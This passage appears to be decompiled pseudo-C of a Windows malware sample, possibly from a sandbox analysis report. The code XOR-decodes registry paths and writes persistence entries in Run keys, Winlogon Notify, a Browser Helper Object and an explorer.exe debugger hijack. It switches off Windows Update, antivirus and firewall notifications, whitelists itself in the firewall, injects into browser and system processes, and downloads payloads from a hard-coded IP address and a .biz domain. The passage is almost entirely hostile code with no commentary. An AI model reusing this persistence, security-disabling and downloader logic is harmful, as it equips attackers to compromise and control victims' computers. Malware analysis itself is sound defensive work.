																									_t1317[0xa0] = _t663;
																									__eflags = _t663;
																									_t1240 = _t663;
																									if(_t663 == 0) {
																										L589:
																										_t1177 =  &(_t1317[0xd08]);
																										_t664 = GetTempPathA(0x104, _t1177);
																										_push(0x80);
																										_push( *0x4120d0);
																										L00405E30();
																										SetFileAttributesA(_t664, _t1177);
																										_t666 = CreateFileA(_t1177, 0x40000000, 0, 0, 2, 0x80, 0);
																										_t1317[0xa0] = _t666;
																										__eflags = _t666;
																										_t1240 = _t666;
																										if(_t666 == 0) {
																											L592:
																											_t1317[0xd08] = 0;
																											L593:
																											__eflags = _t1317[0xd08];
																											if(_t1317[0xd08] != 0) {
																												CreateFileA( &(_t1317[0xd20]), 0x80000000, 1, 0, 3, 0, 0); // executed
																											}
																											_t1178 =  &(_t1317[0xac]);
																											GetSystemDirectoryA(_t1178, 0x104);
																											_push(0x41103e);
																											_push(_t1178);
																											L00405E30();
																											E004012C2(_t1178);
																											ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t1178, 0x104);
																											E004012C2(_t1178);
																											ExpandEnvironmentStringsA("%AppData%\\", _t1178, 0x104);
																											E004012C2(_t1178);
																											_t676 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
																											while(1) {
																												__eflags = _t676 - 0x40724d;
																												if(_t676 >= 0x40724d) {
																													break;
																												}
																												 *_t676 =  *_t676 ^ 0x000000d4;
																												_t676 =  &(_t676[1]);
																											}
																											_t677 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006,  &(_t1317[0x98])); // executed
																											__eflags = _t677;
																											if(_t677 == 0) {
																												L600:
																												__eflags = _t1317[0x2c];
																												if(_t1317[0x2c] == 0) {
																													_t1191 =  &(_t1317[0x1568]);
																													_t817 = E00401251(_t1317[0x98]);
																													_push(_t1191);
																													L00405E40();
																													_t818 = _t817 + 1;
																													__eflags = _t818;
																													RegSetValueExA(_t1317[0xac],  *0x4120b0, 0, 1, _t1191, _t818);
																												}
																												RegDeleteValueA(_t1317[0x9c], "winrnt.exe"); // executed
																												RegCloseKey(_t1317[0x98]); // executed
																												L603:
																												__eflags =  *0x412100 - 2;
																												if( *0x412100 != 2) {
																													L643:
																													_t680 = CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t1317[0x9c])); // executed
																													CloseHandle(_t680);
																													_t682 = "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}";
																													while(1) {
																														__eflags = _t682 - 0x407060;
																														if(_t682 >= 0x407060) {
																															break;
																														}
																														 *_t682 =  *_t682 ^ 0x000000d4;
																														_t682 =  &(_t682[1]);
																													}
																													_t1317[0x30] = 0;
																													while(1) {
																														E004011CF(0x80000002, "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}");
																														__eflags = _t1317[0x30] - 9;
																														if(_t1317[0x30] <= 9) {
																															goto L682;
																														}
																														L648:
																														_t1317[0x58] = 0;
																														_t1317[0x5c] = 0;
																														_t741 = E004025C3();
																														__eflags = _t741;
																														if(_t741 != 0) {
																															L679:
																															 *_t1317 = 0;
																															L683:
																															_t1317[0x34] = 0x3b;
																															do {
																																__eflags = _t1317[0xd08];
																																if(_t1317[0xd08] != 0) {
																																	_push(0);
																																	_push("opera.exe");
																																	_push("seamonkey.exe");
																																	_push("mozilla.exe");
																																	_push("firefox.exe");
																																	_push("iexplore.exe");
																																	_push("explorer.exe");
																																	E0040318D( &(_t1317[0xd24]));
																																	_t1317 =  &(_t1317[0x20]);
																																}
																																__eflags = _t1317[0x28];
																																if(_t1317[0x28] != 0) {
																																	_t1182 =  &(_t1317[0xf2c]);
																																	SetFileAttributesA(_t1182, 0x21); // executed
																																	_t718 = RegCreateKeyA(0x80000002,  &(_t1317[0x103c]),  &(_t1317[0x98])); // executed
																																	__eflags = _t718;
																																	if(_t718 == 0) {
																																		E00401251(_t1317[0x98]);
																																		_t1317[0x9c] = 1;
																																		_t722 = RegSetValueExA(_t1317[0xac], "IsInstalled", 0, 4,  &(_t1317[0xa0]), 4); // executed
																																		_push(_t1182);
																																		L00405E40();
																																		_t723 = _t722 + 1;
																																		__eflags = _t723;
																																		RegSetValueExA(_t1317[0xac], "StubPath", 0, 1, _t1182, _t723); // executed
																																		RegCloseKey(_t1317[0x98]); // executed
																																	}
																																}
																																__eflags = _t1317[0x2c];
																																_t1288 =  &(_t1317[0x98]);
																																if(_t1317[0x2c] == 0) {
																																	_t685 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, _t1288);
																																	__eflags = _t685;
																																	if(_t685 == 0) {
																																		L694:
																																		_t1179 =  &(_t1317[0x1568]);
																																		_push(_t1179);
																																		L00405E40();
																																		_t686 = _t685 + 1;
																																		__eflags = _t686;
																																		_push(_t686);
																																		_push(_t1179);
																																		_push(1);
																																		_push(0);
																																		_push( *0x4120b0);
																																		L695:
																																		RegSetValueExA(_t1317[0xac], ??, ??, ??, ??, ??); // executed
																																		RegCloseKey(_t1317[0x98]); // executed
																																		L696:
																																		__eflags = _t1317[0x24];
																																		if(_t1317[0x24] == 0) {
																																			goto L706;
																																		}
																																		_t1180 =  &(_t1317[0x9c]);
																																		_t693 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t1180, 0); // executed
																																		__eflags = _t693;
																																		if(_t693 == 0) {
																																			L699:
																																			RegSetValueExA(_t1317[0xac], "SubshellState", 0, 3,  &(_t1317[0x7bc]), 0x22a); // executed
																																			RegCloseKey(_t1317[0x98]); // executed
																																			L700:
																																			_t1181 =  &(_t1317[0xe1c]);
																																			SetFileAttributesA(_t1181, 0x21); // executed
																																			__eflags =  *0x412100 - 2;
																																			_t1291 =  &(_t1317[0x98]);
																																			if( *0x412100 != 2) {
																																				_t698 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t1291);
																																				__eflags = _t698;
																																				if(_t698 != 0) {
																																					goto L706;
																																				}
																																				_push(_t1181);
																																				L00405E40();
																																				RegSetValueExA(_t1317[0xac], 0, 0, 1, _t1181, _t698 + 1);
																																				RegSetValueExA(_t1317[0xac], "ThreadingModel", 0, 1, "Both", 5);
																																				RegCloseKey(_t1317[0x98]);
																																				_t703 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t1291);
																																				__eflags = _t703;
																																				if(_t703 != 0) {
																																					goto L706;
																																				}
																																				L705:
																																				RegCloseKey(_t1317[0x98]); // executed
																																				goto L706;
																																			}
																																			_t705 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t1291); // executed
																																			__eflags = _t705;
																																			if(_t705 != 0) {
																																				goto L706;
																																			}
																																			_t707 = E00401251(_t1317[0x98]);
																																			_push(_t1181);
																																			L00405E40();
																																			RegSetValueExA(_t1317[0xac], "DLLName", 0, 1, _t1181, _t707 + 1); // executed
																																			RegSetValueExA(_t1317[0xac], "Startup", 0, 1, "Startup", 8); // executed
																																			goto L705;
																																		}
																																		_t711 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t1180, 0);
																																		__eflags = _t711;
																																		if(_t711 != 0) {
																																			goto L700;
																																		}
																																		goto L699;
																																	}
																																	_t685 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, _t1288);
																																	__eflags = _t685;
																																	if(_t685 != 0) {
																																		goto L696;
																																	}
																																	goto L694;
																																}
																																_t1183 =  &(_t1317[0x123c]);
																																SetFileAttributesA(_t1183, 0x21); // executed
																																_t692 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", _t1288); // executed
																																__eflags = _t692;
																																if(_t692 != 0) {
																																	goto L696;
																																}
																																_t713 = E00401251(_t1317[0x98]);
																																_push(_t1183);
																																L00405E40();
																																_push(_t713 + 1);
																																_push(_t1183);
																																_push(1);
																																_push(0);
																																_push("Debugger");
																																goto L695;
																																L706:
																																SetFileAttributesA( &(_t1317[0x156c]), 0x21); // executed
																																Sleep(0x3e8); // executed
																																_t476 =  &(_t1317[0x34]);
																																 *_t476 = _t1317[0x34] - 1;
																																__eflags =  *_t476;
																															} while ( *_t476 >= 0);
																															L707:
																															_t729 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t1317[0x48]), 0);
																															__eflags = _t729;
																															if(_t729 != 0) {
																																do {
																																	E004011CF(0x80000002, "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}");
																																	__eflags = _t1317[0x30] - 9;
																																	if(_t1317[0x30] <= 9) {
																																		goto L682;
																																	}
																																	goto L648;
																																} while (_t729 != 0);
																															}
																															_t1317[0x40] = 4;
																															_t1187 =  &(_t1317[0x40]);
																															_t731 = RegQueryValueExA(_t1317[0x58], "g00d d0gg", 0, 0, _t1187,  &(_t1317[0x40]));
																															__eflags = _t731;
																															if(_t731 == 0) {
																																_t734 = _t1317[0x3c] - 1;
																																__eflags = _t734;
																																_t1317[0x3c] = _t734;
																																if(_t734 == 0) {
																																	RegDeleteValueA(_t1317[0x48], "g00d d0gg");
																																	Sleep(0x1388);
																																	__eflags =  *0x412100 - 2;
																																	if( *0x412100 != 2) {
																																		ExitWindowsEx(6, 0);
																																	} else {
																																		RtlAdjustPrivilege(0x13, 1, 0,  &(_t1317[0x3b]));
																																		 *0x412240(1);
																																	}
																																} else {
																																	RegSetValueExA(_t1317[0x58], "g00d d0gg", 0, 4, _t1187, 4);
																																}
																															}
																															RegCloseKey(_t1317[0x44]);
																															continue;
																														}
																														_t743 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t1317[0x70]), 0);
																														__eflags = _t743;
																														if(_t743 != 0) {
																															__eflags =  *_t1317;
																															if( *_t1317 == 0) {
																																goto L683;
																															}
																															L681:
																															_t1317[0x30] = 0;
																															goto L683;
																														}
																														_t1314 =  &(_t1317[0x64]);
																														GetSystemTimeAsFileTime(_t1314);
																														_t1317[0x60] = 8;
																														_t1279 =  &(_t1317[0x5c]);
																														_t745 = RegQueryValueExA(_t1317[0x80], "ConnPred", 0,  &(_t1317[0x5c]), _t1279,  &(_t1317[0x60]));
																														__eflags = _t745;
																														if(_t745 != 0) {
																															L652:
																															__eflags = E004014D8(_t1314, 0x412070) - 0x4af;
																															if(__eflags <= 0) {
																																L663:
																																__eflags =  *0x412080;
																																if( *0x412080 == 0) {
																																	L666:
																																	_t1317[0x60] = 8;
																																	__eflags = RegQueryValueExA(_t1317[0x80], "UseExtProfile", 0,  &(_t1317[0x5c]), _t1279,  &(_t1317[0x60]));
																																	if(__eflags != 0) {
																																		L668:
																																		_t750 = E00402427(__eflags);
																																		__eflags = _t750;
																																		if(_t750 != 0) {
																																			L678:
																																			RegCloseKey(_t1317[0x6c]);
																																			goto L679;
																																		}
																																		_push(1);
																																		_push(0);
																																		_t753 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																																		__eflags = _t753;
																																		if(_t753 == 0) {
																																			L671:
																																			_t1317[0x60] = 8;
																																			_t1185 =  &(_t1317[0x4c]);
																																			_t755 = RegQueryValueExA(_t1317[0x80], "UseDflProfile", 0,  &(_t1317[0x5c]),  &(_t1317[0x4c]),  &(_t1317[0x60]));
																																			__eflags = _t755;
																																			if(_t755 != 0) {
																																				_t764 = _t1317[0x58] + 0x1162f100;
																																				__eflags = _t764;
																																				asm("adc edx, 0xffffff9b");
																																				_t1317[0x48] = _t764;
																																				_t1317[0x4c] = _t1317[0x5c];
																																			}
																																			__eflags = E004014D8( &(_t1317[0x64]), _t1185) - 0x152ab;
																																			if(__eflags <= 0) {
																																				goto L678;
																																			}
																																			_t758 = E00402427(__eflags);
																																			__eflags = _t758;
																																			if(_t758 != 0) {
																																				goto L678;
																																			}
																																			_push(3);
																																			_push(0);
																																			_t760 = E0040211B("tombul.gif", 0);
																																			__eflags = _t760;
																																			if(_t760 == 0) {
																																				goto L678;
																																			}
																																			_push(8);
																																			_push(_t1314);
																																			_push(0xb);
																																			_push(0);
																																			_push("UseDflProfile");
																																			L677:
																																			RegSetValueExA(_t1317[0x80], ??, ??, ??, ??, ??);
																																			RegCloseKey(_t1317[0x6c]);
																																			 *_t1317 = 1;
																																			goto L681;
																																		}
																																		_t1317[0x58] = _t1317[0x64].dwLowDateTime;
																																		_t1317[0x5c] = _t1317[0x68];
																																		_push(8);
																																		_push(_t1314);
																																		_push(0xb);
																																		_push(0);
																																		_push("UseExtProfile");
																																		goto L677;
																																	}
																																	__eflags = E004014D8( &(_t1317[0x64]),  &(_t1317[0x58])) - 0x152ab;
																																	if(__eflags <= 0) {
																																		goto L671;
																																	}
																																	goto L668;
																																}
																																_push(3);
																																_push(0);
																																_t769 = E0040211B("grazie.gif", 0);
																																__eflags = _t769;
																																if(_t769 == 0) {
																																	goto L666;
																																}
																																_t1317[0x58] = _t1317[0x64].dwLowDateTime;
																																_t1317[0x5c] = _t1317[0x68];
																																_push(8);
																																_push(_t1314);
																																_push(0xb);
																																_push(0);
																																_push("ConnPred");
																																goto L677;
																															}
																															_t771 = E00402427(__eflags);
																															__eflags = _t771;
																															if(_t771 != 0) {
																																goto L678;
																															}
																															_t773 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																															_t1290 = 0;
																															__eflags = _t773;
																															_t1186 = _t773;
																															if(_t773 != 0) {
																																_t778 = E00401E00(_t773,  &(_t1317[0x56]), 2);
																																__eflags = _t778 - 2;
																																if(_t778 == 2) {
																																	_t1290 = 1;
																																}
																															}
																															E00401F59(_t1186);
																															__eflags = _t1290;
																															if(_t1290 == 0) {
																																 *0x412080 = 0;
																																goto L663;
																															}
																															 *0x412070 = _t1317[0x64];
																															_t777 = 0;
																															__eflags = _t1317[0x52] - 0x49;
																															 *0x412074 = _t1317[0x68];
																															if(_t1317[0x52] == 0x49) {
																																__eflags = _t1317[0x53] - 0x54;
																																if(_t1317[0x53] == 0x54) {
																																	_t777 = 1;
																																}
																															}
																															 *0x412080 = _t777;
																															goto L663;
																														}
																														_t780 = E004014D8(_t1314, _t1279);
																														__eflags = _t780 - 0x152ab;
																														if(_t780 <= 0x152ab) {
																															goto L666;
																														}
																														goto L652;
																														L682:
																														_t439 =  &(_t1317[0x30]);
																														 *_t439 =  &(_t1317[0x30][1]);
																														__eflags =  *_t439;
																														goto L683;
																													}
																												}
																												_t781 = "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU";
																												while(1) {
																													__eflags = _t781 - 0x407214;
																													if(_t781 >= 0x407214) {
																														break;
																													}
																													 *_t781 =  *_t781 ^ 0x000000d4;
																													_t781 =  &(_t781[1]);
																												}
																												_t782 = "NoAutoUpdate";
																												while(1) {
																													__eflags = _t782 - 0x4071cf;
																													if(_t782 >= 0x4071cf) {
																														break;
																													}
																													 *_t782 =  *_t782 ^ 0x000000d4;
																													_t782 =  &(_t782[1]);
																												}
																												_t1292 =  &(_t1317[0x98]);
																												_t783 = RegCreateKeyA(0x80000002, "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", _t1292); // executed
																												__eflags = _t783;
																												if(_t783 == 0) {
																													RegSetValueExA(_t1317[0xac], "NoAutoUpdate", 0, 4,  &(_t1317[0xa0]), 4); // executed
																													RegCloseKey(_t1317[0x98]);
																												}
																												_t784 = "SOFTWARE\\Microsoft\\Security Center";
																												while(1) {
																													__eflags = _t784 - 0x4071c2;
																													if(_t784 >= 0x4071c2) {
																														break;
																													}
																													 *_t784 =  *_t784 ^ 0x000000d4;
																													_t784 =  &(_t784[1]);
																												}
																												_t785 = "AntiVirusOverride";
																												while(1) {
																													__eflags = _t785 - 0x407188;
																													if(_t785 >= 0x407188) {
																														break;
																													}
																													 *_t785 =  *_t785 ^ 0x000000d4;
																													_t785 =  &(_t785[1]);
																												}
																												_t786 = "AntiVirusDisableNotify";
																												while(1) {
																													__eflags = _t786 - 0x407176;
																													if(_t786 >= 0x407176) {
																														break;
																													}
																													 *_t786 =  *_t786 ^ 0x000000d4;
																													_t786 =  &(_t786[1]);
																												}
																												_t787 = "FirewallDisableNotify";
																												while(1) {
																													__eflags = _t787 - 0x40715f;
																													if(_t787 >= 0x40715f) {
																														break;
																													}
																													 *_t787 =  *_t787 ^ 0x000000d4;
																													_t787 =  &(_t787[1]);
																												}
																												_t788 = "UpdatesDisableNotify";
																												while(1) {
																													__eflags = _t788 - 0x407149;
																													if(_t788 >= 0x407149) {
																														break;
																													}
																													 *_t788 =  *_t788 ^ 0x000000d4;
																													_t788 =  &(_t788[1]);
																												}
																												_t789 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006, _t1292); // executed
																												__eflags = _t789;
																												if(_t789 == 0) {
																													_t1190 =  &(_t1317[0xa0]);
																													RegSetValueExA(_t1317[0xac], "AntiVirusOverride", 0, 4, _t1190, 4); // executed
																													RegSetValueExA(_t1317[0xac], "AntiVirusDisableNotify", 0, 4, _t1190, 4); // executed
																													RegSetValueExA(_t1317[0xac], "FirewallDisableNotify", 0, 4, _t1190, 4); // executed
																													RegSetValueExA(_t1317[0xac], "UpdatesDisableNotify", 0, 4, _t1190, 4); // executed
																													RegCloseKey(_t1317[0x98]); // executed
																												}
																												_t790 = "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";
																												while(1) {
																													__eflags = _t790 - 0x407134;
																													if(_t790 >= 0x407134) {
																														break;
																													}
																													 *_t790 =  *_t790 ^ 0x000000d4;
																													_t790 =  &(_t790[1]);
																												}
																												_t791 = RegOpenKeyExA(0x80000002, "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0x2001f, _t1292); // executed
																												__eflags = _t791;
																												if(_t791 != 0) {
																													goto L643;
																												}
																												_t793 = E00401000(0x8000);
																												_t1317[0x74] = 0x4000;
																												_t1293 = _t793;
																												_t794 = 0x407080;
																												_t1317[0x9c] = 0x4000;
																												while(1) {
																													__eflags = _t794 - 0x4070a4;
																													if(_t794 >= 0x4070a4) {
																														break;
																													}
																													 *_t794 =  *_t794 ^ 0x000000d4;
																													_t794 =  &(_t794[1]);
																												}
																												_t1317[0x34] = 0;
																												while(1) {
																													_t386 =  &(_t1293[0x4000]); // 0x4000
																													_t1188 = _t386;
																													_t798 = RegEnumValueA(_t1317[0xb4], _t1317[0x4c], _t1293,  &(_t1317[0xac]), 0,  &(_t1317[0x78]), _t386,  &(_t1317[0x74]));
																													__eflags = _t798;
																													if(_t798 != 0) {
																														break;
																													}
																													__eflags = _t1317[0x70] - 1;
																													if(_t1317[0x70] == 1) {
																														_t800 = E00401311(_t1188, 0x40708d);
																														__eflags = _t800;
																														if(_t800 != 0) {
																															RegDeleteValueA(_t1317[0x9c], _t1293);
																														}
																													}
																													_t381 =  &(_t1317[0x34]);
																													 *_t381 =  &(_t1317[0x34][1]);
																													__eflags =  *_t381;
																													_t1317[0x74] = 0x4000;
																													_t1317[0x9c] = 0x4000;
																												}
																												_t1189 =  &(_t1317[0x1568]);
																												_t803 = wsprintfA(_t1293, 0x407080, _t1189) + 1;
																												__eflags = _t803;
																												_t1317 =  &(_t1317[0xc]);
																												RegSetValueExA(_t1317[0xac], _t1189, 0, 1, _t1293, _t803);
																												E00401029(_t1293);
																												RegCloseKey(_t1317[0x98]);
																												goto L643;
																											}
																											_t821 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006,  &(_t1317[0x98]));
																											__eflags = _t821;
																											if(_t821 != 0) {
																												goto L603;
																											}
																											goto L600;
																										}
																										__eflags = _t666 - 0xffffffff;
																										if(_t666 == 0xffffffff) {
																											goto L592;
																										}
																										L591:
																										WriteFile(_t1240, 0x408840, 0x5e00,  &(_t1317[0xa0]), 0); // executed
																										CloseHandle(_t1317[0xa0]); // executed
																										goto L593;
																									}
																									__eflags = _t663 - 0xffffffff;
																									if(_t663 != 0xffffffff) {
																										goto L591;
																									}
																									goto L589;
																								}
																								__eflags = _t829 + 1;
																								if(_t829 + 1 != 0) {
																									L572:
																									WriteFile(_t1317[0xb0], 0x40e640, 0x1400,  &(_t1317[0xa0]), 0); // executed
																									__eflags = _t1317[0xc];
																									if(_t1317[0xc] != 0) {
																										SetFileTime(_t1317[0xac],  &(_t1317[0x84]),  &(_t1317[0x88]),  &(_t1317[0x8c])); // executed
																									}
																									CloseHandle(_t1317[0xa0]); // executed
																									_t1317[0x24] = 1;
																									_push(0);
																									_push("winlogon.exe");
																									_t1192 =  &(_t1317[0xe20]);
																									_t835 = E0040318D(_t1192);
																									_t1317 =  &(_t1317[0xc]);
																									__eflags = _t835;
																									if(_t835 == 0) {
																										_push(0);
																										_push("explorer.exe");
																										E0040318D(_t1192);
																										_t1317 =  &(_t1317[0xc]);
																									}
																									_push(0);
																									_push("kernel32.dll");
																									_push(_t1192);
																									L586:
																									E0040318D();
																									_t1317 =  &(_t1317[0xc]);
																									CreateFileA( &(_t1317[0xe30]), 0x80000000, 1, 0, 3, 0, 0); // executed
																									goto L587;
																								}
																								goto L584;
																							}
																							__eflags = _t655 + 1;
																							if(_t655 + 1 != 0) {
																								goto L572;
																							}
																							goto L581;
																						}
																						L578:
																						_t1317[0x24] = 1;
																						_push(0);
																						_push("kernel32.dll");
																						_push( &(_t1317[0xe20]));
																						goto L586;
																					}
																					__eflags = _t651 + 1;
																					if(_t651 + 1 == 0) {
																						goto L577;
																					}
																					goto L572;
																				}
																				_t1294 =  &(_t1317[0x5aa]);
																				_t843 = GetTempFileNameA(_t1173, "tmp", 0, _t1294);
																				__eflags = _t843;
																				if(_t843 == 0) {
																					goto L570;
																				}
																				_t844 = CreateFileA(_t1294, 0x40000000, 0, 0, 2, 0x80, 0);
																				_t1317[0xa0] = _t844;
																				__eflags = _t844;
																				if(_t844 == 0) {
																					goto L570;
																				}
																				__eflags = _t844 + 1;
																				if(_t844 + 1 == 0) {
																					goto L570;
																				}
																				L567:
																				WriteFile(_t1317[0xb0], _t1317[0x20], _t1313,  &(_t1317[0xa0]), 0); // executed
																				CloseHandle(_t1317[0xa0]);
																				CreateFileA( &(_t1317[0x5c2]), 0x80000000, 1, 0, 3, 0, 0); // executed
																				_t1295 =  &(_t1317[0x7b9]);
																				_t1264 =  &(_t1317[0x589]);
																				_t1225 =  &(_t1317[0x9e2]);
																				while(1) {
																					__eflags = _t1295 - _t1225;
																					if(_t1295 >= _t1225) {
																						goto L570;
																					}
																					_t852 = _t1317[0x7b8] & 0x000000ff ^  *_t1264;
																					_t1264 =  &(_t1264[0]);
																					 *_t1295 = _t852;
																					_t1295 =  &(_t1295[1]);
																				}
																				goto L570;
																			}
																			_t1296 =  &(_t1317[0x5aa]);
																			_push(_t1296);
																			_push(0);
																			_push(0x411040);
																			_push(_t1172);
																			L00405E90();
																			__eflags = _t645;
																			if(_t645 == 0) {
																				goto L562;
																			}
																			_push(0);
																			_push(0x80);
																			_push(2);
																			_push(0);
																			_push(0);
																			_push(0x40000000);
																			_push(_t1296);
																			L00405DB0();
																			_t1317[0xa0] = _t645;
																			__eflags = _t645;
																			if(_t645 == 0) {
																				goto L562;
																			}
																			__eflags = _t645 + 1;
																			if(_t645 + 1 != 0) {
																				goto L567;
																			}
																			goto L562;
																		}
																		RegDeleteValueA(_t638, "SubshellState");
																		RegCloseKey(_t1317[0x98]);
																		_t1297 =  &(_t1317[0x7b9]);
																		_t1265 =  &(_t1317[0x589]);
																		_t1226 =  &(_t1317[0x9e2]);
																		while(1) {
																			__eflags = _t1297 - _t1226;
																			if(_t1297 >= _t1226) {
																				break;
																			}
																			_t879 = _t1317[0x7b8] & 0x000000ff ^  *_t1297;
																			_t1297 =  &(_t1297[0]);
																			 *_t1265 = _t879;
																			_t1265 =  &(_t1265[1]);
																		}
																		_push( *0x4120b0);
																		_t858 =  &(_t1317[0x58e]);
																		_push(_t858);
																		L00405E50();
																		__eflags = _t858;
																		if(_t858 != 0) {
																			L537:
																			_t1193 =  &(_t1317[0x5ae]);
																			SetFileAttributesA(_t1193, 0x80);
																			DeleteFileA(_t1193);
																			goto L551;
																		}
																		_push( &(_t1317[0x1568]));
																		_t862 =  &(_t1317[0x6b2]);
																		_push(_t862);
																		L00405E50();
																		__eflags = _t862;
																		if(_t862 == 0) {
																			_t864 = CreateFileA( &(_t1317[0x5c2]), 0x80000000, 1, 0, 3, 0, 0);
																			_t1317[0xa0] = _t864;
																			__eflags = _t864;
																			if(_t864 == 0) {
																				goto L537;
																			}
																			__eflags = _t864 - 0xffffffff;
																			if(_t864 == 0xffffffff) {
																				goto L537;
																			}
																			_t865 = GetFileSize(_t864, 0);
																			_t1317[0x74] = _t865;
																			__eflags = _t865 - _t1313;
																			if(_t865 == _t1313) {
																				_t868 = E00401000(_t1313);
																				_t1298 = _t868;
																				ReadFile(_t1317[0xb0], _t868, _t1313,  &(_t1317[0xa0]), 0);
																				_t1194 = _t1317[0x74];
																				_t1266 = _t1298;
																				_t1280 = _t1317[0x14];
																				__eflags = _t1298 - _t1298 + _t1194;
																				while(__eflags < 0) {
																					_t1227 =  *_t1266 & 0x000000ff;
																					__eflags = _t1317[0x589] - ( *_t1280 & 0x000000ff);
																					if(__eflags == 0) {
																						__eflags = _t1227;
																					}
																					if(__eflags == 0) {
																						_t1266 =  &(_t1266[1]);
																						_t1280 =  &(_t1280[1]);
																						__eflags = _t1266 - _t1298 + _t1194;
																						continue;
																					}
																					E00401029(_t1298);
																					goto L541;
																				}
																				E00401029(_t1298);
																				goto L570;
																			}
																			L541:
																			CloseHandle(_t1317[0xa0]);
																		}
																		goto L537;
																	}
																	_t1195 =  &(_t1317[0xf2c]);
																	_t880 = GetSystemDirectoryA(_t1195, 0x104);
																	_push( *0x412090);
																	_push(0x41103e);
																	_push(_t1195);
																	L00405E30();
																	_push(_t880);
																	L00405E30();
																	_t881 = "{0C8E6D89-EA51-848A-7775-6C2CC072CA88}";
																	while(1) {
																		__eflags = _t881 - 0x407286;
																		if(_t881 >= 0x407286) {
																			break;
																		}
																		 *_t881 =  *_t881 ^ 0x000000d4;
																		_t881 =  &(_t881[1]);
																	}
																	_t882 = CreateMutexA(0, 0, "{0C8E6D89-EA51-848A-7775-6C2CC072CA88}"); // executed
																	_t1317[0xa0] = _t882;
																	__eflags = _t882;
																	if(_t882 == 0) {
																		Sleep(0x7d0);
																	} else {
																		WaitForSingleObject(_t882, 0x2710);
																		CloseHandle(_t1317[0xa0]);
																	}
																	_t1196 =  &(_t1317[0xf2c]);
																	SetFileAttributesA(_t1196, 0x80); // executed
																	_t884 = CreateFileA(_t1196, 0x40000000, 0, 0, 2, 0x80, 0); // executed
																	_t1317[0xa0] = _t884;
																	__eflags = _t884;
																	if(_t884 == 0) {
																		L530:
																		RegCloseKey(_t1317[0x98]); // executed
																		RegDeleteKeyA(0x80000001,  &(_t1317[0x1038])); // executed
																		goto L531;
																	}
																	__eflags = _t884 - 0xffffffff;
																	if(_t884 == 0xffffffff) {
																		goto L530;
																	}
																	WriteFile(_t884, 0x4072a0, 0x800,  &(_t1317[0xa0]), 0); // executed
																	_t889 = E004010B2();
																	_t1317[0x1b] = _t889;
																	__eflags = _t889;
																	if(_t889 == 0) {
																		_t1317[0x1b] = 0xc6;
																	}
																	_t891 = E00401000(_t1313 + 0x64);
																	 *((char*)(_t891 + _t1313)) = 0;
																	_t1281 = _t891;
																	_t1299 = _t891;
																	_t1268 = _t1317[0x14];
																	_t892 = _t891 + _t1313;
																	while(1) {
																		__eflags = _t1299 - _t892;
																		if(_t1299 >= _t892) {
																			break;
																		}
																		_t917 = _t1317[0x1b] & 0x000000ff ^  *_t1268;
																		_t1268 =  &(_t1268[0]);
																		 *_t1299 = _t917;
																		_t1299 = _t1299 + 1;
																		_t892 = _t1281 + _t1313;
																	}
																	_t893 =  &(_t1317[0x1568]);
																	_t1197 = _t1281 + _t1313;
																	_push(_t893);
																	L00405E40();
																	_t1300 = _t1197 +  &(_t893[5]);
																	__eflags = _t1300 - _t1197 + 0x64;
																	while(__eflags < 0) {
																		 *_t1300 = E004010B2();
																		_t1300 = _t1300 + 1;
																		_t255 = _t1313 + 0x64; // 0x64
																		__eflags = _t1300 - _t1281 + _t255;
																	}
																	 *(_t1281 + _t1313 + 1) = _t1313;
																	_t1199 = _t1281 + _t1313;
																	_push( &(_t1317[0x1568]));
																	_t1301 = _t1199;
																	_push( &(_t1199[1]));
																	L00405E20();
																	_t896 =  &(_t1199[0x19]);
																	while(1) {
																		__eflags = _t1301 - _t896;
																		if(_t1301 >= _t896) {
																			break;
																		}
																		 *_t1301 =  *_t1301 ^ _t1317[0x1b] & 0x000000ff;
